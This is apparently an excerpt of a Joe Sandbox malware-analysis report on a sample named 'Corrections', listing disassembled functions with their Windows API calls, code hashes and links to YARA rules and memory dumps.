Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 3013587201-2590602151
Opcode ID: 6eac0f6903bc410f967924d10c9ea7746bb2ff0c42c48007856a3e3e9777b160
Instruction ID: 1fb2353fe3234a5d974538483fcb2bbab19ad56462c5238a8c4a7c0194cf7351
Opcode Fuzzy Hash: 6eac0f6903bc410f967924d10c9ea7746bb2ff0c42c48007856a3e3e9777b160
Instruction Fuzzy Hash: 8EE02B72C1B714DBD73A57244C48EAA32586F14B01F1489E4EC09F6150EB28CC448654

Function 0098096F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8437915002d4a2e405be6437d6c36e6ae728e4469e98c930b26fc85038e63b
Instruction ID: ec461fd3790419f390646c30db45eec0fd6c7880911b8b7b51572ab2a16cc748
Opcode Fuzzy Hash: fd8437915002d4a2e405be6437d6c36e6ae728e4469e98c930b26fc85038e63b
Instruction Fuzzy Hash: 85C15975A0020AEFDB44DF94C898AAEB7B9FF88704F108598E405EB351D731EE85CB90

Function 009541F3 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0095427E
__alldvrm.LIBCMT ref: 0095447F
__alldvrm.LIBCMT ref: 009544A1

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction ID: 07d0a858525e5ee27f48f123d2f40fed2775b5d939899b3a4746bb58dd41e3d4
Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
Instruction Fuzzy Hash: F4A19A729443869FDB21CF1AC8917AEBBE8EF51319F1441ADED959B2A1C3388CC9C750

Function 00980D26 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,009C0BD4,?), ref: 00980EE0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,009C0BD4,?), ref: 00980EF8
CLSIDFromProgID.OLE32(?,?,00000000,009BDCE0,000000FF,?,00000000,00000800,00000000,?,009C0BD4,?), ref: 00980F1D
_memcmp.LIBVCRUNTIME ref: 00980F3E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: ca1e555a485901ccd3b2e06f3c02bcb08c2f28eea163c41684fe6094fcde63cf
Instruction ID: 4bf89f048ff88fb3579e884cf5a02632c33903d6e393466b894518a69aff1cce
Opcode Fuzzy Hash: ca1e555a485901ccd3b2e06f3c02bcb08c2f28eea163c41684fe6094fcde63cf
Instruction Fuzzy Hash: 5A811B71A00209EFCB54DF94C984EEEB7B9FF89315F204558F506AB251DB71AE0ACB60

Function 009AB0DC Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 009AB10C
Process32FirstW.KERNEL32(00000000,?), ref: 009AB11A

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Process32NextW.KERNEL32(00000000,?), ref: 009AB1FC
CloseHandle.KERNEL32(00000000), ref: 009AB20B

Part of subcall function 0093E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00964D73,?), ref: 0093E395

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 28b01b644963d77c37f29ddf4cc7697b6871d7d648f9fbdcce358a39447665cd
Instruction ID: 80c6c54cef34bf353be751d954a953611bed21d07fd09347b18e0c3e343bd6f5
Opcode Fuzzy Hash: 28b01b644963d77c37f29ddf4cc7697b6871d7d648f9fbdcce358a39447665cd
Instruction Fuzzy Hash: DA51F7B1508311AFD310EF24D886A5BBBE8FF89754F40492DF599972A1EB70E904CB92

Function 00961711 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00961840

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 661d175e58aae3e81ba182085c07a6ed7c303702731a4e78be8c144e449a3ea9
Instruction ID: ad7e1cb2cb88f0b80111ab64bd762d487bdea42eb85c439a113267f509ad9c68
Opcode Fuzzy Hash: 661d175e58aae3e81ba182085c07a6ed7c303702731a4e78be8c144e449a3ea9
Instruction Fuzzy Hash: D2412731A00105ABDB21BFBE8C42F7E3AA8EF85370F2D0625F818D71A1EA35484557A1

Function 009A2533 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 009A255A
WSAGetLastError.WSOCK32 ref: 009A2568
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009A25E7
WSAGetLastError.WSOCK32 ref: 009A25F1

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 4ffd3ab7bf55e1dbf98f3d2e8e1afa6c2cbcb58219aff4ee05d3506928bd93a0
Instruction ID: 6fac7f8dcaaeed0a3d4c5610dbc62af4df64f49fd7976af720925b57ad7b0118
Opcode Fuzzy Hash: 4ffd3ab7bf55e1dbf98f3d2e8e1afa6c2cbcb58219aff4ee05d3506928bd93a0
Instruction Fuzzy Hash: F841C374A00210AFE720AF24D886F2A77E5AF45718F54C448F95A9F3D2D772ED418BD1

Function 009B6CB0 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 009B6D1A
ScreenToClient.USER32(?,?), ref: 009B6D4D
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 009B6DBA

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: b0a818288d3c379efcd79722417aab82f604bb9ae7ba763e2f5c9ecc8ee10214
Instruction ID: 70a78c7a5a2d7ef1bd2951110c5527ff0b9dc9f1e7e79a74e4c43907fb8a61e3
Opcode Fuzzy Hash: b0a818288d3c379efcd79722417aab82f604bb9ae7ba763e2f5c9ecc8ee10214
Instruction Fuzzy Hash: C5513974A00209EFCF24DF64DA81AEE7BBAFB84320F208559F9159B290D774ED91DB50

Function 0095B79F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b52479afba393f28b4ae93f3568cc2f000edc568981dec6eca78a1152ad78903
Instruction ID: 54398b4723d59070be8e6e445b94467aa5c15b954fb5fbfcf1aed43bd8ca2609
Opcode Fuzzy Hash: b52479afba393f28b4ae93f3568cc2f000edc568981dec6eca78a1152ad78903
Instruction Fuzzy Hash: 0141F772A00704AFD725EF79CC51B6ABBEDEBC8711F20852EF611DB291D772A9058780

Function 0099611E Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009961C8
GetLastError.KERNEL32(?,00000000), ref: 009961EE
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00996213
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0099623F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: b2a89c1cc9b2a17537e4b5e27cd0362df23322a0325e6e95417be688d7125de0
Instruction ID: 5a5ccfa9e35571f18f320a41803730c9b62d7ea75b3b254153bed36345760a59
Opcode Fuzzy Hash: b2a89c1cc9b2a17537e4b5e27cd0362df23322a0325e6e95417be688d7125de0
Instruction Fuzzy Hash: 71414F35600611DFCF11EF14C585A1EB7E2EF89720B198488E85AAB366CB34FD01DB91

Function 0095DC43 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,009470E1,00000000,00000000,00948649,?,00948649,?,00000001,009470E1,8BE85006,00000001,00948649,00948649), ref: 0095DC90
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0095DD19
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0095DD2B
__freea.LIBCMT ref: 0095DD34

Part of subcall function 00953B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A79,?,0000015D,?,?,?,?,009485B0,000000FF,00000000,?,?), ref: 00953BC5

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 3bceefd5249d53f0cc0a9f7c4c479219c1789c0894c82f3874d79da4c16250f4
Instruction ID: e07f6003a13e28ae16bfc51d4f614b91a1d56943115250b8a854042b700f0677
Opcode Fuzzy Hash: 3bceefd5249d53f0cc0a9f7c4c479219c1789c0894c82f3874d79da4c16250f4
Instruction Fuzzy Hash: AE31D032A0120AABDF24DF69CC45EAE7BB9EF40711F040128FC04D6190EB35CD58CBA0

Function 0098B41E Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0098B473
SetKeyboardState.USER32(00000080), ref: 0098B48F
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0098B4FD
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0098B54F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 977b894c0eeef90c8e62242224484d24929580349c5d3d60b5d1d410580d28ed
Instruction ID: 565c38a3ebe131187fa14ba6e85b76d5ff305224519accdc09b50f2345548cec
Opcode Fuzzy Hash: 977b894c0eeef90c8e62242224484d24929580349c5d3d60b5d1d410580d28ed
Instruction Fuzzy Hash: 7B316B70A00608AEFF30EB34C8067FE7BB9AB49320F0C421AF095963E2C378D9459761

Function 0098B563 Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 0098B5B8
SetKeyboardState.USER32(00000080,?,00008000), ref: 0098B5D4
PostMessageW.USER32(00000000,00000101,00000000), ref: 0098B63B
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 0098B68D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 2ef9ab572f436f60e1eaf79323b363e1d0106d553bc07e804a5b32690ac830f6
Instruction ID: 40aa9d85fc59b82cb390ffc309ce7bb7caf6e064a9a30bd8e11d938e6bd5be57
Opcode Fuzzy Hash: 2ef9ab572f436f60e1eaf79323b363e1d0106d553bc07e804a5b32690ac830f6
Instruction Fuzzy Hash: 12313E30D406089EFF30AB64C8057FE7BAAEF85330F0C422AE485563D1E77489459B91

Function 009B80AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 009B80D4
GetWindowRect.USER32(?,?), ref: 009B814A
PtInRect.USER32(?,?,?), ref: 009B815A
MessageBeep.USER32(00000000), ref: 009B81C6

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: c39134c01469850f03b6da5e32e716616383ef9c30eccde331a0c1c1b9d45c3f
Instruction ID: 3b8492af9b2fda4d6c6da8176be7b148a29155e4bf8480f6554b44009eded7c4
Opcode Fuzzy Hash: c39134c01469850f03b6da5e32e716616383ef9c30eccde331a0c1c1b9d45c3f
Instruction Fuzzy Hash: 3A417E30A0A215DFCB15CF5CCA88BEA77FDBB49324F1445A8E9549B261CB74A883DF50

Function 009B2176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 009B2187

Part of subcall function 00984393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009843AD
Part of subcall function 00984393: GetCurrentThreadId.KERNEL32 ref: 009843B4
Part of subcall function 00984393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00982F00), ref: 009843BB

GetCaretPos.USER32(?), ref: 009B219B
ClientToScreen.USER32(00000000,?), ref: 009B21E8
GetForegroundWindow.USER32 ref: 009B21EE

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: ad72cc574d8ccb2f470ef566b86cf7cb96c3dd8a02cdd217692170c0f230f1a0
Instruction ID: c76b24bfe9ac2c1cb01f9c1aa37e97428d13952c4eaed5b1397f5a2084900929
Opcode Fuzzy Hash: ad72cc574d8ccb2f470ef566b86cf7cb96c3dd8a02cdd217692170c0f230f1a0
Instruction Fuzzy Hash: E53143B1D05119AFCB04EFA9C9C1DEEBBFCEF88314B50846AE415E7211DA719E45CBA0

Function 0098E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON

Download Yara Rule

APIs

Part of subcall function 009241EA: _wcslen.LIBCMT ref: 009241EF

_wcslen.LIBCMT ref: 0098E8E2
_wcslen.LIBCMT ref: 0098E8F9
_wcslen.LIBCMT ref: 0098E924
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0098E92F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: e155238958f00a44b610afea687e4dc8e2887dfbc121b3c1124b68f018c90829
Instruction ID: d7246a2cdf52ec0148f6c4fea41ce699f8dd131f4eab10103e5c55aca447f937
Opcode Fuzzy Hash: e155238958f00a44b610afea687e4dc8e2887dfbc121b3c1124b68f018c90829
Instruction Fuzzy Hash: 5921C476D01215EFDB10AFA4D982BAEB7F8EF95360F144065F904BB381D6709E41CBA1

Function 009B9A25 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0

GetCursorPos.USER32(?), ref: 009B9A5D
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009B9A72
GetCursorPos.USER32(?), ref: 009B9ABA
DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 009B9AF0

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 0d0cfe6084b003c959cbacc80cdd47e0e4101429ca0d37b102ab140d0d19866c
Instruction ID: fd04576af7fd02a590c4f848f329adb9a3fd13609c42c3b350aa6e70e20bb544
Opcode Fuzzy Hash: 0d0cfe6084b003c959cbacc80cdd47e0e4101429ca0d37b102ab140d0d19866c
Instruction Fuzzy Hash: 1721DC34610018FFCF298F94C988EFA7BB9EF4A360F504165FA058B1A1E7759990EB60

Function 0098DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,009BDC30), ref: 0098DBA6
GetLastError.KERNEL32 ref: 0098DBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 0098DBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,009BDC30), ref: 0098DC21

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: e5657e599c49b84cd7e5cd7a6e3c5f2917db6b02a573fcdb9abf82c8e5d3eb13
Instruction ID: 9d3b8f57603656a65fa6b780db28fb888aa71013196f15fafe8d509c80a427a5
Opcode Fuzzy Hash: e5657e599c49b84cd7e5cd7a6e3c5f2917db6b02a573fcdb9abf82c8e5d3eb13
Instruction Fuzzy Hash: EA21A37014A2019F8700EF24D98199BBBE8FE96364F100A1DF4E9C33E1E730D946DB82

Function 009B321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 009B32A6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 009B32C0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 009B32CE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009B32DC

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
